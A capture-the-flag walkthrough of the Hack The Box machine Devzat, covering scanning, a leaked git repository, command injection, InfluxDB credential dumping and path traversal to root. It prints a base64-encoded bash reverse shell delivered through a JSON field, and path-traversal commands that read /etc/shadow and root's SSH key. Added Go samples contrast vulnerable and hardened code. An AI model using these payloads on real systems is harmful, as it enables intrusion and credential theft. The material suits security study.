Basic information

Port scanning

Ports 22, 80 and 8000 are open:

$ nmap -sC -sV 10.10.11.118

Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-19 14:02 CST
Nmap scan report for 10.10.11.118
Host is up (0.069s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c2:5f:fb:de:32:ff:44:bf:08:f5:ca:49:d4:42:1a:06 (RSA)
| 256 bc:cd:e8:ee:0a:a9:15:76:52:bc:19:a4:a3:b2:ba:ff (ECDSA)
|_ 256 62:ef:72:52:4f:19:53:8b:f2:9b:be:46:88:4b:c3:d0 (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://devzat.htb/
8000/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-Go
| ssh-hostkey:
|_ 3072 6a:ee:db:90:a6:10:30:9f:94:ff:bf:61:95:2a:20:63 (RSA)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.92%I=7%D=10/19%Time=616E5FA6%P=x86_64-apple-darwin20.4
SF:.0%r(NULL,C,"SSH-2\.0-Go\r\n");
Service Info: Host: devzat.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.93 seconds

Port 80

Visiting the IP redirects to the domain name, so add a hosts entry for devzat.htb:

Port 8000

Port 8000 is an SSH service whose banner is SSH-2.0-Go, and the page on port 80 hints at it as well:

Searching on those details turns up the project:

Testing the connection shows nothing exploitable for now:

Subdomains

Non-existent subdomains all answer with a 302, so ffuf is the better fit here (filter on status 200); gobuster also works:

gobuster vhost -u http://devzat.htb -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -t 50 | grep 200

ffuf -c -u http://devzat.htb -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.devzat.htb" -mc 200

pets.devzat.htb

pets.devzat.htb

There is an "add" function that takes two parameters in JSON format:

git leak

The exposed .git directory is easy to find:

gobuster dir -u http://pets.devzat.htb/ -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 --wildcard  --exclude-length 510

Code audit

After dumping the repository, a code review shows an obvious command injection: the add-pet function takes name and species parameters, and species is concatenated directly into a shell command line:
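To make the bug concrete, here is an added example (written for this writeup, not the pets app's own code) that reproduces the pattern side by side with a hardened version. The exact command line ("cat characteristics/<species>") and the allowlist pattern are assumptions for the example; the point is that the vulnerable version hands user input to sh -c, while the hardened one validates the input and never spawns a shell:

```go
package main

import (
	"errors"
	"fmt"
	"os/exec"
	"regexp"
	"strings"
)

// vulnerableCmd mirrors the pattern described above: the user-supplied
// species value is concatenated into a shell command line. The command
// itself is an assumption for this example, not the project's code verbatim.
func vulnerableCmd(species string) []string {
	return []string{"sh", "-c", "cat characteristics/" + species}
}

// runVulnerable executes the command so the injection is visible: with a
// species of "cat;echo INJECTED" the shell runs two commands and the output
// of the second one comes back to the caller.
func runVulnerable(species string) string {
	argv := vulnerableCmd(species)
	out, _ := exec.Command(argv[0], argv[1:]...).CombinedOutput()
	return string(out)
}

// speciesRe is an allowlist: a species is a short, plain lowercase word.
var speciesRe = regexp.MustCompile(`^[a-z]{1,32}$`)

// hardenedCmd validates the input and builds an argv without a shell, so
// metacharacters such as ';' or '|' would be ordinary characters even if the
// allowlist let them through (it does not).
func hardenedCmd(species string) ([]string, error) {
	if !speciesRe.MatchString(species) {
		return nil, errors.New("invalid species")
	}
	return []string{"cat", "characteristics/" + species}, nil
}

func main() {
	payload := "cat;echo INJECTED"
	fmt.Printf("vulnerable argv: %q\n", vulnerableCmd(payload))
	fmt.Printf("vulnerable output contains INJECTED: %v\n",
		strings.Contains(runVulnerable(payload), "INJECTED"))
	if _, err := hardenedCmd(payload); err != nil {
		fmt.Println("hardened rejects payload:", err)
	}
	argv, _ := hardenedCmd("cat")
	fmt.Printf("hardened argv: %q\n", argv)
}
```

Running it shows "INJECTED" in the vulnerable output even though the cat itself fails, which is exactly the primitive the reverse shell below relies on.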

shell

Base64-encode the payload so that quotes, ampersands and slashes don't interfere with the JSON body or the shell:

echo "bash -c 'exec bash -i &>/dev/tcp/10.10.14.5/4444 <&1'" | base64
YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTAuMTAuMTQuNS80NDQ0IDwmMScK

{"name":"miao","species":"cat;echo -n 'YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTAuMTAuMTQuNS80NDQ0IDwmMScK' | base64 -d | bash"}

The shell runs as patrick, whose .ssh directory contains a private key; log in over SSH to make the rest easier:

Enumeration

Basic enumeration shows a few ports listening only on localhost; forwarding one of them reveals InfluxDB:

ssh -L 8086:127.0.0.1:8086 -i patrick_id_rsa patrick@10.10.11.118

InfluxDB

Searching for this version turns up a known vulnerability:

The database contains usernames and passwords:

{
  "results": [
    {
      "series": [
        {
          "columns": [
            "time",
            "enabled",
            "password",
            "username"
          ],
          "name": "user",
          "values": [
            [
              "2021-06-22T20:04:16.313965493Z",
              false,
              "WillyWonka2021",
              "wilhelm"
            ],
            [
              "2021-06-22T20:04:16.320782034Z",
              true,
              "woBeeYareedahc7Oogeephies7Aiseci",
              "catherine"
            ],
            [
              "2021-06-22T20:04:16.996682002Z",
              true,
              "RoyalQueenBee$",
              "charles"
            ]
          ]
        }
      ],
      "statement_id": 0
    }
  ]
}
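InfluxDB returns rows positionally, with the column order only given in the "columns" array, so it is worth parsing the envelope by column name rather than by fixed index. The following is an added example (not part of the original writeup or of InfluxDB) that does that with the response above embedded as sample input, and pulls out the accounts marked enabled, which are the ones worth trying for a login:

```go
package main

import (
	"encoding/json"
	"fmt"
)

// sampleResponse is the /query response shown above, embedded here so the
// example runs offline.
const sampleResponse = `{"results":[{"series":[{"columns":["time","enabled","password","username"],"name":"user","values":[["2021-06-22T20:04:16.313965493Z",false,"WillyWonka2021","wilhelm"],["2021-06-22T20:04:16.320782034Z",true,"woBeeYareedahc7Oogeephies7Aiseci","catherine"],["2021-06-22T20:04:16.996682002Z",true,"RoyalQueenBee$","charles"]]}],"statement_id":0}]}`

// queryResponse models only the part of the InfluxDB response envelope we
// need: results -> series -> columns/values.
type queryResponse struct {
	Results []struct {
		Series []struct {
			Name    string          `json:"name"`
			Columns []string        `json:"columns"`
			Values  [][]interface{} `json:"values"`
		} `json:"series"`
	} `json:"results"`
}

type userRow struct {
	Username string
	Password string
	Enabled  bool
}

// parseUsers extracts rows from the "user" measurement. Values are
// positional and the column order is not guaranteed, so columns are looked
// up by name; a missing or short row simply yields zero values.
func parseUsers(raw string) ([]userRow, error) {
	var resp queryResponse
	if err := json.Unmarshal([]byte(raw), &resp); err != nil {
		return nil, err
	}
	var rows []userRow
	for _, r := range resp.Results {
		for _, s := range r.Series {
			if s.Name != "user" {
				continue
			}
			idx := make(map[string]int, len(s.Columns))
			for i, c := range s.Columns {
				idx[c] = i
			}
			field := func(v []interface{}, name string) interface{} {
				if i, ok := idx[name]; ok && i < len(v) {
					return v[i]
				}
				return nil
			}
			for _, v := range s.Values {
				u := userRow{}
				u.Username, _ = field(v, "username").(string)
				u.Password, _ = field(v, "password").(string)
				u.Enabled, _ = field(v, "enabled").(bool)
				rows = append(rows, u)
			}
		}
	}
	return rows, nil
}

// enabledUsers returns the usernames whose account is marked enabled.
func enabledUsers(rows []userRow) []string {
	var out []string
	for _, r := range rows {
		if r.Enabled {
			out = append(out, r.Username)
		}
	}
	return out
}

func main() {
	rows, err := parseUsers(sampleResponse)
	if err != nil {
		panic(err)
	}
	for _, r := range rows {
		fmt.Printf("%-10s enabled=%-5v password=%s\n", r.Username, r.Enabled, r.Password)
	}
	fmt.Println("enabled accounts:", enabledUsers(rows))
}
```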

catherine & user flag

With catherine's password in hand, SSH is not allowed for her, but su works and user.txt can be read:

Privilege escalation

The backups directory holds two zip files; unpacking the dev one and reading its code reveals a file command that reads arbitrary files, protected by a hardcoded password:

root flag

The same code shows the dev instance listens on port 8443; connect to it and use the file command to read root.txt (and anything else root can read):

/file ../../root/root.txt CeilingCatStillAThingIn2021?
/file ../../etc/shadow CeilingCatStillAThingIn2021?
/file ../../root/.ssh/id_rsa CeilingCatStillAThingIn2021?
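The reason "../../root/root.txt" works is that the file argument is joined onto a base directory without any containment check. As an added example (written for this writeup, not devzat's own code; the base directory name is an assumption), the following contrasts that pattern with a resolver that cleans the path and refuses anything that ends up outside the base:

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// vulnerableFilePath mirrors the pattern behind the /file command above: the
// user-supplied argument is glued onto a base directory, so "../../" walks
// straight out of it.
func vulnerableFilePath(base, requested string) string {
	return base + "/" + requested
}

// safeFilePath resolves the requested name inside base and rejects anything
// that escapes it. filepath.Join cleans the result, so ".." segments are
// collapsed before the check, and filepath.Rel then tells us whether the
// target still lies under base. Symlinks inside base are not resolved here;
// apply filepath.EvalSymlinks to both sides if the base may contain them.
func safeFilePath(base, requested string) (string, error) {
	absBase, err := filepath.Abs(base)
	if err != nil {
		return "", err
	}
	target := filepath.Join(absBase, requested)
	rel, err := filepath.Rel(absBase, target)
	if err != nil {
		return "", err
	}
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errors.New("path escapes base directory")
	}
	return target, nil
}

func main() {
	// Assumed base directory for the example.
	base := "/home/catherine/devzat"
	for _, req := range []string{"docs/todo.txt", "../../root/root.txt", "../../etc/shadow"} {
		fmt.Printf("request %q\n", req)
		fmt.Printf("  vulnerable -> %s\n", vulnerableFilePath(base, req))
		if p, err := safeFilePath(base, req); err != nil {
			fmt.Printf("  safe       -> rejected: %v\n", err)
		} else {
			fmt.Printf("  safe       -> %s\n", p)
		}
	}
}
```

The hardcoded password is the second half of the problem: even with the traversal fixed, a secret baked into a backup that a low-privileged user can read is not a secret, so the check should read its credential from configuration outside the source tree.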
